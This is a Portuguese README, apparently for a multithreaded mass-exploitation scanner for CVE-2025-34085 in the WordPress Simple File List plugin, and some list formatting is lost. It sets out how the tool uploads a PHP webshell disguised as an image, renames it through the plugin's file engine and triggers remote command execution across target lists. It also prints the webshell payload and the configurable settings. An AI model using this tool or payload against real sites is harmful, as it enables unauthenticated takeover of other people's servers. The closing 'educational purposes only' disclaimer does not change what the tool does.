Scanner de RCE não autenticado para múltiplos alvos para o CVE-2025-34085 que afeta o plugin Simple File List do WordPress. Faz upload, renomeia e aciona webshells PHP em grandes conjuntos de alvos.
Scanner de exploração em massa para CVE-2025-34085 — uma vulnerabilidade de execução remota de código não autenticada no plugin WordPress Simple File List.
Esta ferramenta faz upload de um payload PHP disfarçado de imagem, renomeia-o através de um motor de arquivos vulnerável e aciona a execução de shell com um comando personalizado. Suporta varredura multithread em grandes conjuntos de alvos.
targets.txt)vuln.txtpython3 CVE-2025-34085.py
Os alvos devem ser listados em targets.txt:
example.com
http://target2.com
https://target3.com
Edite os seguintes valores no script conforme necessário:
COMMAND = "id" # Shell command to execute
EXPECTED_SUBSTRING = "uid=" # String to verify successful command execution
THREADS = 20 # Number of concurrent threads
<?php system($_GET['cmd']); ?> através do vulnerável ee-upload-engine.php.ee-file-engine.php.cmd=id.Acertos bem-sucedidos são salvos em:
vuln.txt
Cada linha inclui a URL vulnerável, o caminho do shell e a saída do comando.
wp-content/uploads/ gravávelEsta ferramenta é apenas para fins educacionais e testes autorizados. Use por sua conta e risco. O acesso não autorizado a sistemas é ilegal.